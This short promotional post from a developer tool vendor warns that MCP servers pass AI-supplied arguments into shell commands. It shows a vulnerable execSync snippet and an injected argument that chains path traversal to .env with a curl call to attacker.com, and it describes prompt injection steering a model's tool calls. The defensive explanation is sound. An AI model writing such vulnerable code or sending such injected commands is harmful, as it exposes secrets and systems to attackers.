Most MCP servers I've seen are doing this:
server.tool("run_script", async ({ filename }) => {
execSync(`node scripts/${filename}`);
});
That's command injection. The parameter comes from an AI model — which can be manipulated through prompt injection in its context to send ../../.env && curl attacker.com.
The mental model most developers are missing: an AI model is an untrusted caller. The same validation discipline you apply to HTTP query parameters applies to MCP tool arguments. The threat model is identical — only the caller changed.
We just shipped 12 static analysis checks specifically for MCP servers:
- command injection,
- path traversal,
- missing schema validation,
- prompt injection via tool descriptions.
Runs automatically on JS, TS, and Python MCP code.
No config, no API key.
Full breakdown of what we detect and why it matters:
--> https://codeslick.dev/blog/mcp-server-security
If you're building MCP servers, this is worth 5 minutes.
Top comments (0)